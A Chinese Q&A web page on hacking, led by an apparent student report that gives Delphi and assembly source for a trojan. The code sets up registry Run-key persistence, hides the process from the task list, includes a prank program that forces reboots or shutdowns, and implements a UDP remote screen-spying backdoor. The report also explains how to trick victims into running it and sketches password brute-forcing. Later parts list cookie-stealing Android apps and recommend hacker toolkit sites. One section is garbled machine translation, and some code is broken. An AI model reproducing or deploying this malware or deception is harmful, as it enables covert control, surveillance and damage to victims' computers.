本文目录一览：

• 1、电脑网络中的“后门”是什么意思？
• 2、Geektyper电脑版怎么用
• 3、有什么好的防黑工具吗
• 4、2016 黑客必备的Android应用都有哪些
• 5、无意中下载了Hacker Evolution（骇客净化）请问怎么玩？
• 6、Vstart黑客工具包下载会不会中毒

电脑网络中的“后门”是什么意思？

电脑网络中的“后门”即是网络的漏洞

一、问题的提出

"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是著名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来，网络给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随网络产生成长的，是指那些对电脑和网络有狂热兴趣的人，他们不断的研究电脑和网络知识，发现电脑和网络中的漏洞，喜欢挑战高难度的网络系统，千方百计的寻找网络中的大小漏洞，然后向网络管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑网络四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是网络上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。

现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触网络后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在网络机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计方法，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获网络上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统

一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西制作成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。

木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改方法一般是通过修改注册表：

Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和

Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

StdCtrls,registry;

type

TForm1 = class(TForm)

Button1: TButton;

Button2: TButton;

procedure Button1Click(Sender: TObject);

procedure Button2Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);

var

regf:tregistry;

sysdir:pchar;

temp:string;

begin

getmem(sysdir,256);

getsystemdirectory(sysdir,128);

temp:=sysdir+'\client.exe';

freemem(sysdir,256);

regf:=tregistry.create;

regf.rootkey:=hkey_local_machine;

regf.openkey('software\microsoft\windows\currentversion\run',true);

regf.writestring(' ',temp);

regf.free;

copyfile(pchar('hacker.exe'),pchar(temp),true);

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

close;

end;

end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。

在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：

asm

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。

下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;

uses

windows;

var temp:integer;

begin

asm

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

randomize;

temp:=random(3);

if temp=0 then

while(true) do

begin

messagebeep(0);

SetCursorPos (random(640),random(480));

end

else if temp=1 then

ExitWindowsEx(EWX_REBOOT,0)

else ExitWindowsEx(EWX_SHUTDOWN,0);

end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。

另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类

1、破坏型

惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。

2、密码发送型

可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。

在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。

3、远程访问型

最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。

程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：

让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

NMUDP, ComCtrls;

type

Tclient = class(TForm)

cudp: TNMUDP;

Animate1: TAnimate;

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure cudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

client: Tclient;

implementation

const bufsize=2048;//发送每一批数据的缓冲区大小

var

bmpstream:tmemorystream;

leftsize:longint;

{$R *.DFM}

procedure screencap(leftpos,toppos,rightpos,bottompos:integer);

var

recwidth,recheight:integer;

sourcedc,destdc,bhandle:integer;

bitmap:Tbitmap;

begin

recwidth:=rightpos-leftpos;

recheight:=bottompos-toppos;

sourcedc:=createdc('display','','',nil);

destdc:=createcompatibledc(sourcedc);

bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);

selectobject(destdc,bhandle);

bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,srccopy);

bitmap:=tbitmap.Create;

bitmap.Handle:=bhandle;

bitmap.SaveToStream(bmpstream);

bmpstream.Position:=0;

leftsize:=bmpstream.Size;

bitmap.Free;

deletedc(destdc);

releasedc(bhandle,sourcedc);

end;

procedure Tclient.FormCreate(Sender: TObject);

begin

bmpstream:=tmemorystream.create;

end;

procedure Tclient.FormDestroy(Sender: TObject);

begin

bmpstream.free;

end;

procedure Tclient.cudpDataReceived(Sender: TComponent;

NumberBytes: Integer; FromIP: String);

var

ctrlcode:array[0..29] of char;

buf:array[0..bufsize-1] of char;

tmpstr:string;

sendsize,leftpos,toppos,rightpos,bottompos:integer;

begin

cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码

if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'

then

begin//控制码前4位为"SHOW"表示主控机发出了截屏指令

if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据

begin tmpstr:=strpas(ctrlcode);

tmpstr:=copy(tmpstr,5,length(tmpstr)-4);

leftpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

toppos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

rightpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

bottompos:=strtoint(copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));

screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数

end;

if leftsizebufsize then sendsize:=bufsize

else sendsize:=leftsize;

bmpstream.ReadBuffer(buf,sendsize);

leftsize:=leftsize-sendsize;

if leftsize=0 then bmpstream.Clear;

cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址

cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口

end;

end;

end.

主控机程序部分：

让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

ExtCtrls, StdCtrls, Buttons, NMUDP;

type

Tsever = class(TForm)

Edit1: TEdit;

Edit2: TEdit;

Label1: TLabel;

Label2: TLabel;

BitBtn1: TBitBtn;

Image1: TImage;

BitBtn2: TBitBtn;

sudp: TNMUDP;

procedure BitBtn2Click(Sender: TObject);

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure BitBtn1Click(Sender: TObject);

procedure sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

sever: Tsever;

implementation

const bufsize=2048;

var

rsltstream,tmpstream:tmemorystream;

{$R *.DFM}

procedure Tsever.BitBtn2Click(Sender: TObject);

begin

close;

end;

procedure Tsever.FormCreate(Sender: TObject);

begin

rsltstream:=tmemorystream.create;

tmpstream:=tmemorystream.create;

end;

procedure Tsever.FormDestroy(Sender: TObject);

begin

rsltstream.free;

tmpstream.free;

end;

procedure Tsever.BitBtn1Click(Sender: TObject);

var

reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

tmpstream.Clear;

rsltstream.Clear;

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

procedure Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

var reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

sudp.ReadStream(tmpstream);

rsltstream.CopyFrom(tmpstream,numberbytes);

if numberbytesbufsize then

begin

rsltstream.Position:=0;

image1.Picture.Bitmap.LoadFromStream(rsltstream);

tmpstream.Clear;

rsltstream.Clear;

end

else

begin

tmpstream.Clear;

reqcode:='show';

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

end;

end.

四、如何预防黑客

黑客程序虽然破坏大，但不是不能防止的。

1、处理好你的密码

我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。

⑴ 密码不可和账号相同，这是最容易被猜到的了。

⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。

⑶ 密码最好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，最好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。

⑷ 有人喜欢用自己的生日、电话、身份证号码等作为密码，你不要这样做。

⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。

2、不要运行不明真相的程序

无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、著名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。

3、经常检查系统信息

上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。

4、最好不去聊天室

我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。

Geektyper电脑版怎么用

geektyper主界面中还有右下角的按钮，如果玩家需要对软件进行设置的话，就需要点击这个按钮，在弹出的设置界面中可以设置软件的使用界面和文字的色彩，也可以对格式进行修改设置，设置之后更方便的使用软件。

很多人在日常生活中，总是希望自己可以在网络中有所作为，有了这款工具之后，可以让玩家或者用户体验黑客，通过生动有趣的模拟黑客类软件，了解黑客在网络中的一些实际经历。

geektyper其实就是一款非常有趣的模拟黑客类的工具，这款工具可以帮助用户模拟店长上的一些黑客操作电脑的过程，其中还包括了可以敲击代码，以及再出现很多高大上的弹窗的时候，能够自定义代码颜色还可以自定义背景，自定义logo图标，是非常有趣的游戏项目。

有什么好的防黑工具吗

着Internet的发展，加之更多的人开始使用Internet进行金融和消费活动，黑客比以前有了更多侵入计算机系统的机会。 虽然现在大多数单位都采用了防火墙，然而黑客能够通过VPN和 Telecomputer（在家里通过使用与工作单位连接的计算机终端）连接绕过防火墙。一旦黑客进入到防火墙之内，就很容易利用服务器和工作站进行破坏活动。 BlackICE是一个很优秀的网络监测软件，它提供了强大的黑客防护功能，能够辨别和阻止200多种黑客程序，并提供攻击者的信息。 一、下载和安装 BlackICE的下载地址： http：// 文件大小：2.72MB。 BlackICE的安装很简单，运行下载文件bibasic.exe后，它会自动进行解压缩，然后选择合适的目录，再就是猛点“NEXT”和“YES”按钮，即可进行安装。 （安装时它会自动检测以前是否安装过老版本；如果有的话，它会提示你升级到最新版本） 二、工作原理 BlackICE是由一个功能非常强大的监测和分析引擎构成的，它能够检测所有网络端口，当发现黑客的攻击行为时，它会在跳出的窗口中显示相关的信息，并且拦截相应的数据包进行处理。 黑客的信息会显示在Intruders一栏中，黑客进攻的类型和信息会显示在Attacks一栏中。如果黑客试图侵入，BlackICE会封锁来自黑客IP地址的任何通路，这样无论黑客怎样尝试，都不能绕过BlackICE。 BlackICE记录的信息不仅包括黑客进攻的类型，还准确地记录了谁正在侵入你的电脑以及向你电脑发送的所有数据。 三、设置 鼠标右键点击任务栏上的BlackICE图标，选择“configuration BlackICE”，可以对BlackICE进行功能设置。 1．Back Trace（回溯） 此项可以让你查看和修改控制回溯功能的配置参数。当BlackICE强大的监视引擎检测到可疑的事件发生时，它会立即搜集相关的信息。一个可以给黑客定位的方法就是使用回溯（back tracing）。回溯是网络连接返回到原始状态。 当有人通过网络连接到你的电脑时，你的系统和入侵者的系统就相互交换数据包（packets）。黑客的数据包在到达你的系统之前，首先要通过几个路由器。 BlackICE可以从这些数据包中剥离信息，阻止信息返回黑客的系统。 BlackICE回溯信息的方式有直接（direct）和间接（indirect）两种。间接回溯使用与黑客系统不产生联系的协议，沿着通向黑客系统的路径，从其他来源间接收集信息；直接回溯使用各种方法直接从黑客的系统收集信息。 直接回溯比间接回溯能收集到更可靠的信息。黑客不能检测到间接回溯，但是直接回溯可能被黑客发觉——幸运的是，大多数黑客没有阻止直接回溯的经验。 由于直接回溯和黑客的系统直接联系，所以要求更高的系统安全性。 Threshold指受到黑客的攻击的严重程度，默认值是30和60。20-40属于可疑事件，40-80属于严重事件，至于80以上么……两个参数用于确定在发生什么等级的事件时，才会触发直接和间接的回溯。 2.Packet Log（数据包记录） 此项用于记录数据包的特征等情况，可能会占用一些系统资源，但是可以详细记录黑客的情况。 Logging Enabled：默认是关闭的，激活时可以记录所有系统流通情况。 File Prefix：文件名的前缀。例如，如果你的文件名是abc，则log文件是abc0001.log. Maximum Size （kbytes）：指定记录（log）文件的最大值,默认是0。 Maximum Number of Files：指定记录文件最大数量，默认是10。 3.Evidence Log（证据记录） BlackICE不停地检测系统，一旦发现可疑的情况，它立即开始搜集相关的信息。这个信息被放在证据文件中。 证据文件是记录可疑的黑客的原始的网络通行情况的文件。它的设置和数据包记录基本相同。 4.Protection（保护） 这一项用来设置BlackICE的安全等级，加强系统安全。预设的等级有四种： 1）Paranoid：这项设置是有限制性的，但是如果你的系统遭到黑客频繁的攻击，这一项设置就很有用了。它可以阻止所有内部的入侵，还可以限制一些网站和交互式内容的浏览。 2）Nervous：在你遭遇黑客不停的攻击的情况，选择这项设置是很好的。 BlackICE可以阻止对所有系统端口和TCP应用端口中的入侵。这项设置可能会限制一些有交互内容的网站浏览。多媒体和其他程序不受影响。 3）Cautious：适用于Internet的常规使用，它只禁止系统端口中有数据进入，其他端口不受阻塞，所以不妨碍网络使用。 4）Trusting：如果选择这个选项，BlackICE仅仅阻塞Internet上的文件共享（除非特别设置了允许Internet上的文件共享）。 Internet文件共享允许其他网络使用者共享你电脑中的文件。阻止文件共享可以保证黑客不能从你的电脑中下载数据。所有其他端口保持开放状态。 尽管禁止了Internet上的文件共享，但内部网络的文件共享是可以的。这种设置适合于与Internet的连接比较慢而且受到攻击的可能比较小的情况。 Allow Internet File Sharing（允许Internet文件共享）一项最好不要使用。如果你希望阻止他人访问你的电脑，你有必要选择Allow NetBIOS Neighborhood（允许Netbios网上邻居）。 5.Trusted Addresses（信任地址） 在这一项设置中，你可以输入你认为安全的网络地址，这样BlackICE就会把这些地址排除在监视和防护的网址范围以外。点击“Add”，输入一个你信任的地址。 6.Blocked Addresses（禁止地址） 从这一项，你可以看到BlackICE禁止的地址，来自这个IP地址的所有信息将会被拒绝。它也可以显示目前的黑客的地址。 禁止的地址都有详细和精确的开始时间和结束时间，时间可以是几分钟或者几天。如果有必要，这些地址也可以被转换成信任的地址。 你可以点击右键，选择Unblock and Trust，就可以转换了。点击上面的标签可以进行排序。 7.ICEcap BlackICE集成了ICEcap，可以集中地报告和分析网络的入侵行为。ICEcap主要用于多个系统和Internet的连接。 四、BlackICE的使用 BlackICE由两个主要部分组成：隐形检测和防护引擎和摘要程序。 隐形检测与防护： 一旦安装了BlackICE，BlackICE就会在后台静静地工作（一般不容易察觉，以防止他人禁用此程序）。此时它会自动防护攻击，所以不必担心黑客了。 摘要程序显示目前所有黑客入侵的信息。它也包含目前网络的攻击和入侵的图示。它有三个键（攻击、入侵和历史），每个键显示黑客入侵的不同方面（如图4）。 1.Attack（攻击） 这一项显示BlackICE检测到的黑客攻击事件列表，包括黑客攻击的时间、攻击事件类型和攻击执行者的名字。 2.Intruders（入侵者） 这一项汇集了BlackICE回溯收集到的所有入侵者的信息（IP地址、安全等级）。 3.History（历史） 这一项以图表的形式清楚地显示你的系统受攻击的情况和目前的网络状况。 图表可以以分、小时和天的方式显示。 你可以看到在90天的时间内受到的严重的攻击（critical）207个，可疑的攻击（suspicious）29个。网络状况是7.6M数据包。 要阻止黑客的攻击，从Intruder键下，右击你希望阻止的入侵者，在弹出的菜单中选择Block Intruder，在弹出的第二个菜单中可以设定阻止的时间：一小时、一天、一个月或永久（如图5）。 另外，对于具体的每个攻击数据，有兴趣的不妨留意图6所示的按钮。如果你此刻正在网络上，只要选中具体的攻击记录，然后再点按钮“advICE”，浏览器就会自动连接到BlackICE开发者的主页上，具体告知你本条攻击记录的性质、攻击类型、危险程度等。 BlackICE是一个共享软件。本文介绍的是它的BlackICE Basic版，试用时间为45天。BlackICE Basic版在使用上有一些限制。要想为你的电脑提供全方位的保护，你可以购买它的完全版BlackICE Defender……。

2016 黑客必备的Android应用都有哪些

AndroRAT

AndroRAT一词源自Android与RAT（即远程管理工具）。这款顶级黑客工具已经拥有相当长的发展历史，而且最初其实是一款客户端/服务器应用。这款应用旨在帮助用户以远程方式控制Android系统，同时从其中提取信息。这款Android应用会在系统启动完成后以服务形式开始运行。因此，如果用户并不需要与该服务进行交互。此应用还允许大家通过呼叫或者短信等方式触发服务器连接。

这款极具实用性的Android黑客应用之功能包括收集联系人、通话记录、消息以及所在位置等信息。此应用还允许大家以远程方式对接收到的消息以及手机运行状态加以监控，进行手机呼叫与短信发送，通过摄像头拍摄照片以及在默认浏览器当中打开URL等等。

github地址：AndroRAT

Hackode

Hackode是一款Android应用，其基本上属于一整套工具组合，主要面向高阶黑客、IT专家以及渗透测试人员。在这款应用当中，我们可以找到三款模块——Reconnaissance、Scanning以及Security Feed。

通过这款应用，大家可以实现谷歌攻击、SQL注入、MySQL Server、Whois、Scanning、DNS查找、IP、MX记录、DNS Dif、Security RSS Feed以及漏洞利用等功能。这是一款出色的Android黑客应用，非常适合入门者作为起步工具且无需提供任何个人隐私信息。

下载地址：Hackode

zANTI

zANTI是一款来自Zimperium的知名Android黑客套件。此软件套件当中包含多种工具，且广泛适用于各类渗透测试场景。这套移动渗透测试工具包允许安全研究人员轻松对网络环境加以扫描。此工具包还允许IT管理员模拟出一套先进黑客环境，并以此为基础检测多项恶意技术方案。

大家可以将zANTI视为一款能够将Backtrack强大力量引入自己Android设备的应用。只要登录至zANTI，它就会映射整套网络并嗅探其中的cookie以掌握此前曾经访问过的各个网站——这要归功于设备当中的ARP缓存。

应用当中的多种模块包括网络映射、端口发现、嗅探、数据包篡改、DoS以及MITM等等。

下载地址：zANTI

FaceNiff

FaceNiff是一款顶级Android黑客应用，允许大家拦截并嗅探WiFi网络流量。这款工具广泛适用于Android用户窥探他人的Facebook、Twitter以及其它社交媒体网站。这款在黑客群体中广受好评的工具能够从WiFi网络中窃取cookie，并为攻击者提供未经授权的、指向受害者账户的访问通道。

FaceNiff由Bartosz Ponurkiewicz开发完成——这位开发者同时也编写出了桌面黑客工具Firesheep for Firefox。

下载地址：FaceNiff

Droidsheep

Droidsheep是一款相当高效的黑客应用，主要作用是针对Wi-Fi网络执行安全性分析。这款应用能够劫持网络之上的Web会话，而且几乎适用于全部服务及网站。

在启动Droidsheep应用之后，它会利用一套路由机制对全部Wi-Fi网络流量进行监控与拦截，同时从活动会话当中提取概要信息。在这款应用的帮助下，我们将能够嗅探Facebook、领英、Twitter以及其它各类社交媒体账户。

DroidSheep Guard，该应用的另一个版本，能够帮助大家在网络之上检测各类ARP嗅探活动——包括由FaceNiff、Droidsheep以及其它软件实施的功能活动。

下载地址：Droidsheep

DroidBox

DroidBox是一款对Android应用进行动态分析的应用方案。在该应用的帮助下，大家可以获得极为广泛的分析结果，包括APK软件包、网络流量、短信与手机呼叫、通过不同通道获取泄露信息等等。

这款出色的Android黑客应用还使得我们能够对Android应用软件包的行为进行可视化处理。

下载地址：DroidBox

APKInspector

APKInspector应用允许大家执行逆向工程任务。在这款应用的帮助下，我们将获得图形功能与分析能力，从而对监控目标拥有更为深入的理解。这款强大的Android黑客工具能够帮助大家从任意Android应用当中获取源代码，并将DEX代码进行可视化以清除其中的信用与授权部分。

下载地址：APKInspector

Nmap

Nmap最具人气的网络扫描应用同时适用于Android操作系统。Nmap同时适用于未root与经过root之手机。如果大家身为新手Android黑客，那么这款黑客应用绝对不可或缺。

下载地址：Nmap

SSHDroid

SSHDroid是一款面向Android系统开发的SSH服务器实现方案，允许大家将自己的Android设备与PC相对接，同时运行“terminal”与“adb shell”等命令，甚至能够实现文件编辑。当我们与远程设备相连接，它还能够提供额外的安全保护机制。

这款应用提供了共享密钥验证、WiFi自动启动白名单以及扩展通知控制等功能。

下载地址：SSHDroid

*投稿作者：w85040，转载须注明来自FreeBuf黑客与极客（FreeBuf.COM）

无意中下载了Hacker Evolution（骇客净化）请问怎么玩？

发挥布赖恩斯宾塞，前情报人员，对一个复杂的敌人所创建的人工智能。从创造一个成功的黑客游戏系列（数字危害，学士河cker等） ，黑客的演变是一个新的黑客模拟游戏，具有无与伦比的绘图和功能。您扮演一名前情报人员，专门从事计算机安全。当一连串的事件引发世界各地，留下重要的服务停用，您担任电脑黑客找出到底发生了什么，试图阻止它。当一个股市，一个中央银行，山tellite上行和跨洋光缆联系崩溃，你知道这是更然后一个简单的活动。一件大事是所有这一切背后，你必须找出是什么。侵入你的电脑，寻找漏洞和信息，窃取金钱购买硬件升级，企图把所有的作品一个大难题，在一起。设定在一个虚拟的作业系统环境，游戏是泛非ked的所有功能要求，使黑客的感觉和经验，每一个游戏。落后的概念演变黑客是创造一个游戏，挑战玩家的智力，注意力化和重点，创造一个迷人的铭记比赛。解决难题，检查代码和比特的信息，以帮助您达到目标。

Vstart黑客工具包下载会不会中毒

一般的黑客工具包收录黑客软件大部分都是收录很多成熟软件和没有捆绑的软件，因为收入内容过于广泛，检测后门的操作也非常的麻烦，所以黑客工具包都会提示注意、自行检测后门等提示提醒用户，所以，单纯的下载使用应该没啥问题，主要还是要注意远控使用时候检测是否有后门的问题。另外，下载这些工具包建议去比较有信誉的黑客网站，比如暗组、饭客这些网站更加安全一些，我大力推荐暗组的2010工具包，3G大小，非常全面。